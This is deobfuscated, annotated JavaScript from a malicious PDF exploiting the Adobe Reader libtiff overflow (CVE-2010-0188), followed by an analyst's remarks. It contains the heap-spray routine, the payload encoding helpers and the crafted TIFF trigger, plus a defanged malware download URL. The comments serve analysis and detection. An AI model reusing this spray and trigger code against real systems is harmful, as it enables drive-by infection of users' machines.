// an array inside PDF JavaScript is a strong heuristic indicator of this technique.
function _I0(_I1) { | |
_I1 = unescape(_I1); | |
// Payload size at two bytes per character.
roteDak = _I1.length * 2; | |
// One character, U+9090: two 0x90 bytes (the x86 NOP opcode) used as filler.
dakRote = unescape('%u9090'); | |
// Filler sized so that payload + filler comes to 0x2000 bytes.
spray = _l7(dakRote, 0x2000 - roteDak); | |
loxWhee = _I1 + spray; | |
// Repeat the 0x2000-byte unit up to 524098 bytes (262049 characters).
loxWhee = _l7(loxWhee, 524098); | |
// Each of the 400 entries is rebuilt with substr + concatenation and kept referenced via _l4.
for (i = 0; i < 400; i++) _l4[i] = loxWhee.substr(0, loxWhee.length - 1) + dakRote; | |
} | |
// Repeats _I1 (by doubling) until it is at least len characters long, then truncates to exactly len.
// The only visible caller uses it to produce 10984 characters of repeated 'QUFB'.
function _I2(_I1, len) { | |
while (_I1.length < len) _I1 += _I1; | |
return _I1.substring(0, len) | |
} | |
// Hex decoder: turns a string of hex digit pairs into a string with one character per byte.
// Writes the implicit globals ret, i, b and c.
function _I3(_I1) { | |
ret = ''; | |
for (i = 0; i < _I1.length; i += 2) { | |
b = _I1.substr(i, 2); | |
c = parseInt(b, 16); | |
ret += String.fromCharCode(c); | |
} | |
return ret | |
} | |
// XORs each character code of _I1 with the key _I4, cycling through the key.
// The only visible call (in _j3) passes an empty key: `_I6 % 0` is NaN, charCodeAt on the
// empty string yields NaN, and `x ^ NaN` equals x, so in this sample the output is the input
// unchanged. The routine looks like an unused de-obfuscation layer left in by the builder.
function _ji1(_I1, _I4) { | |
_I5 = ''; | |
for (_I6 = 0; _I6 < _I1.length; _I6++) { | |
_l9 = _I4.length; | |
_I7 = _I1.charCodeAt(_I6); | |
_I8 = _I4.charCodeAt(_I6 % _l9); | |
_I5 += String.fromCharCode(_I7 ^ _I8); | |
} | |
return _I5 | |
} | |
// Formats a number as lowercase hex, prefixing '0' when the digit count is odd
// (so a byte value always yields two digits). Writes the implicit globals _j0, _j1 and _I5.
function _I9(_I6) { | |
_j0 = _I6.toString(16); | |
_j1 = _j0.length; | |
_I5 = (_j1 % 2) ? '0' + _j0 : _j0; | |
return _I5 | |
} | |
// Re-encodes a byte string as %uXXXX escapes, two input characters per escape, with the second
// character's hex first (little-endian packing). The result is what _I0 later passes to unescape().
// NOTE(review): _I9 assigns the same global _I5 this loop accumulates into; the right-hand side
// of each `+=` is evaluated after the left operand is read, so the accumulation still works.
function _j2(_I1) { | |
_I5 = ''; | |
for (_I6 = 0; _I6 < _I1.length; _I6 += 2) { | |
_I5 += '%u'; | |
_I5 += _I9(_I1.charCodeAt(_I6 + 1)); | |
_I5 += _I9(_I1.charCodeAt(_I6)) | |
} | |
return _I5 | |
} | |
// Entry routine: picks a version-specific payload, sprays it via _I0, then writes a base64
// image into a form field.
// Indicators a defender can take from this function and the blobs it selects:
//  - the field value starts with base64 'SUkq', which decodes to the TIFF header bytes "II*";
//    a TIFF written into rawValue from script matches the libtiff issue (CVE-2010-0188) cited
//    in the page comments;
//  - hex-decoding _l1 / _l2 exposes readable ASCII, including `urlmon`, `regsvr32 -s`, `wpbt`,
//    `.dll` and the download URL hxxp://attitude-tees[.]com/images/1.exe (defanged here).
function _j3() { | |
_j4 = _l5(); | |
// Version gate: below 9000 (Reader 8.x and earlier) uses _l1, otherwise _l2.
if (_j4 < 9000) { | |
// Version-specific base64 tail appended to the image data further down.
_j5 = 'o+uASjgggkpuL4BK/////wAAAABAAAAAAAAAAAAQAAAAAAAAfhaASiAgYA98EIBK'; | |
_j6 = _l1; | |
_j7 = _I3(_j6) | |
} else { | |
_j5 = 'kB+ASjiQhEp9foBK/////wAAAABAAAAAAAAAAAAQAAAAAAAAYxCASiAgYA/fE4BK'; | |
_j6 = _l2; | |
_j7 = _I3(_j6) | |
} | |
// Base64 of the TIFF header ("II*" followed by further header bytes).
_j8 = 'SUkqADggAABB'; | |
// 'QUFB' is base64 for "AAA"; repeated to 10984 characters of padding.
_j9 = _I2('QUFB', 10984); | |
// Base64 tail holding further image data (presumably the TIFF directory entries; not decoded here).
_ll0 = 'QQcAAAEDAAEAAAAwIAAAAQEDAAEAAAABAAAAAwEDAAEAAAABAAAABgEDAAEAAAABAAAAEQEEAAEAAAAIAAAAFwEEAAEAAAAwIAAAUAEDAMwAAACSIAAAAAAAAAAMDAj/////'; | |
_ll1 = _j8 + _j9 + _ll0 + _j5; | |
// XOR with an empty key: returns _j7 unchanged (see _ji1).
_ll2 = _ji1(_j7, ''); | |
// Pad to an even length so _j2 can pack characters in pairs.
if (_ll2.length % 2) _ll2 += unescape('%00'); | |
_ll3 = _j2(_ll2); | |
// The `with` block is obfuscation only; this is equivalent to _I0(_ll3).
with({ | |
k: _ll3 | |
}) _I0(k); | |
// qwe123b is not defined in the visible code; presumably a form field declared in the PDF.
// Assigning the crafted image to its rawValue is the last step of the script.
qwe123b.rawValue = _ll1 | |
} | |
// Runs immediately when the decoded script is evaluated.
_j3(); |
Suspected Adobe Libtiff integer overflow in Reader and Acrobat, per http://wepawet.cs.ucsb.edu/view.php?type=js&hash=1396118ca588eb5e166abc947d447bed&t=1330933988
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0188
This is defunct, I'm guessing, as it tries to load hxxp://attitude-tees[.]com/images/1.exe, which has apparently since been taken down and seems to have been down for at least a day. While this specific one may be a ripped-off version, in general these seem to come from the Blackhole exploit pack, a la http://community.websense.com/cfs-filesystemfile.ashx/__key/CommunityServer.Blogs.Components.WeblogFiles/securitylabs/5287.statistics.png :-)
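Bonus amusement: Note how "eval" is sort-of-cleverly-hidden in the encoded HTML bit: it is spelled out of characters 2, 5, 6 and 8 of 'ghej4vabl' and then looked up as a property of `this`, so the literal word never appears in the script.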